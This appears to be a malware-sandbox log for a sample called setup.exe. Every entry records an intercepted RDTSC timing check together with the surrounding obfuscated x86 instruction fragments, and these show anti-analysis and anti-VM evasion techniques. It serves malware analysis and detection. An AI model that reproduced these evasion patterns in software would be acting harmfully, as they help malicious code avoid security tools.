Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 383272 second address: 3832A3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F47D8E3B0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b xor dword ptr [esp], 1018154Eh 0x00000012 mov ch, 86h 0x00000014 mov esi, dword ptr [ebp+122D3684h] 0x0000001a lea ebx, dword ptr [ebp+1245806Ah] 0x00000020 xchg eax, ebx 0x00000021 jmp 00007F47D8E3B0ABh 0x00000026 push eax 0x00000027 pushad 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3832A3 second address: 3832A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 38338D second address: 3833B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007F47D8E3B0A8h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3833B5 second address: 3833BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F47D8E48266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3833BF second address: 3833C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3833C3 second address: 383435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push ecx 0x0000000b push eax 0x0000000c jbe 00007F47D8E48266h 0x00000012 pop eax 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 jmp 00007F47D8E48276h 0x0000001e pop eax 0x0000001f pop eax 0x00000020 xor ecx, 15AEA406h 0x00000026 push 00000003h 0x00000028 mov cx, di 0x0000002b push 00000000h 0x0000002d mov si, dx 0x00000030 push 00000003h 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007F47D8E48268h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 00000015h 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c mov cx, di 0x0000004f push 4C96DD0Fh 0x00000054 push eax 0x00000055 push edx 0x00000056 jng 00007F47D8E48268h 0x0000005c pushad 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 383435 second address: 383483 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 736922F1h 0x00000011 or cx, D831h 0x00000016 lea ebx, dword ptr [ebp+12458073h] 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007F47D8E3B0A8h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 00000019h 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 sub dl, FFFFFFCEh 0x00000039 movzx ecx, bx 0x0000003c xchg eax, ebx 0x0000003d push eax 0x0000003e push edx 0x0000003f jno 00007F47D8E3B0A8h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 383600 second address: 38360A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F47D8E48266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3962DD second address: 3962E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3962E1 second address: 3962FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F47D8E4826Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3962FF second address: 396303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 396303 second address: 396309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A3FA0 second address: 3A3FB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A4136 second address: 3A4167 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F47D8E4826Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F47D8E48279h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A4167 second address: 3A416B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A4535 second address: 3A453B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A453B second address: 3A455C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B3h 0x00000007 jp 00007F47D8E3B0A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A455C second address: 3A4578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E48278h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A4578 second address: 3A458C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F47D8E3B0A6h 0x00000008 jnl 00007F47D8E3B0A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A4704 second address: 3A470E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F47D8E4826Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A470E second address: 3A4715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A4715 second address: 3A4723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jc 00007F47D8E48266h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A4859 second address: 3A485F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A4A23 second address: 3A4A3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A4BB3 second address: 3A4BCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A4BCB second address: 3A4BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A4BDA second address: 3A4BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A4BDE second address: 3A4BEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A4BEE second address: 3A4BF8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F47D8E3B0AEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A4D50 second address: 3A4D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F47D8E48266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A4D5A second address: 3A4D60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A4D60 second address: 3A4D6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F47D8E48268h 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A4D6E second address: 3A4D9E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F47D8E3B0AAh 0x00000008 jng 00007F47D8E3B0A6h 0x0000000e pop edx 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F47D8E3B0B0h 0x00000017 pop ecx 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push esi 0x0000001b push edi 0x0000001c push edi 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A4D9E second address: 3A4DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A4DA7 second address: 3A4DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A4DAD second address: 3A4DB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A507C second address: 3A5089 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A51F2 second address: 3A520A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48274h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A520A second address: 3A5229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ebx 0x0000000a popad 0x0000000b jne 00007F47D8E3B0C2h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F47D8E3B0AAh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A5229 second address: 3A522D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A522D second address: 3A5231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A5B6C second address: 3A5B70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A5D15 second address: 3A5D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A5FFB second address: 3A600D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E4826Dh 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3A600D second address: 3A6012 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3AA2E6 second address: 3AA2EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3AAAC3 second address: 3AAAE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F47D8E3B0B8h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3ABD95 second address: 3ABD99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3ABD99 second address: 3ABD9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 36E621 second address: 36E632 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F47D8E4826Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3B29DA second address: 3B29DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3B29DE second address: 3B29EB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F47D8E48266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3B2E2F second address: 3B2E3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jns 00007F47D8E3B0A6h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3B2E3D second address: 3B2E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3B2E41 second address: 3B2E67 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d js 00007F47D8E3B0A6h 0x00000013 jl 00007F47D8E3B0A6h 0x00000019 popad 0x0000001a ja 00007F47D8E3B0ACh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3B2F8E second address: 3B2FC3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F47D8E48266h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F47D8E48277h 0x00000011 jnc 00007F47D8E4826Ch 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3B2FC3 second address: 3B2FE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F47D8E3B0B8h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3B316F second address: 3B3178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 379F7F second address: 379FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 jbe 00007F47D8E3B0A6h 0x0000000e popad 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 pushad 0x00000016 jnp 00007F47D8E3B0A6h 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 push edx 0x00000022 jmp 00007F47D8E3B0B6h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3B4EFE second address: 3B4F04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3B54E3 second address: 3B54FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E3B0B7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3B55D0 second address: 3B55E9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F47D8E48266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F47D8E4826Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3B5FB4 second address: 3B5FBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3B68E9 second address: 3B68F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E4826Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3B72AA second address: 3B72B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3B7143 second address: 3B7147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3B72B0 second address: 3B730F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F47D8E3B0B3h 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F47D8E3B0A8h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a jnp 00007F47D8E3B0B2h 0x00000030 xchg eax, ebx 0x00000031 push eax 0x00000032 push edx 0x00000033 jno 00007F47D8E3B0A8h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 376B15 second address: 376B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BA247 second address: 3BA24D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BAB94 second address: 3BAC35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F47D8E48276h 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F47D8E48268h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c jmp 00007F47D8E48271h 0x00000031 push 00000000h 0x00000033 mov edi, dword ptr [ebp+122D3032h] 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ecx 0x0000003e call 00007F47D8E48268h 0x00000043 pop ecx 0x00000044 mov dword ptr [esp+04h], ecx 0x00000048 add dword ptr [esp+04h], 00000019h 0x00000050 inc ecx 0x00000051 push ecx 0x00000052 ret 0x00000053 pop ecx 0x00000054 ret 0x00000055 mov edi, esi 0x00000057 xchg eax, ebx 0x00000058 push eax 0x00000059 push edx 0x0000005a jg 00007F47D8E4826Ch 0x00000060 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BA962 second address: 3BA973 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E3B0ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BA973 second address: 3BA9A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F47D8E48270h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BA9A5 second address: 3BA9AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BC16E second address: 3BC188 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E48276h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BA9AB second address: 3BA9AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BC188 second address: 3BC18C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BCC65 second address: 3BCC6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BCC6A second address: 3BCC79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BCC79 second address: 3BCC83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F47D8E3B0A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3C2CFF second address: 3C2D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3C1D19 second address: 3C1D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3C2D03 second address: 3C2D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F47D8E4826Ch 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3C3D47 second address: 3C3DAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F47D8E3B0B0h 0x0000000f nop 0x00000010 sub dword ptr [ebp+1247A6F6h], ebx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F47D8E3B0A8h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 mov ebx, dword ptr [ebp+122D322Fh] 0x00000038 push 00000000h 0x0000003a sub dword ptr [ebp+122D2CD2h], ecx 0x00000040 xchg eax, esi 0x00000041 pushad 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3C2F5A second address: 3C2F68 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3C5F93 second address: 3C5FB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3C5FB3 second address: 3C5FB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
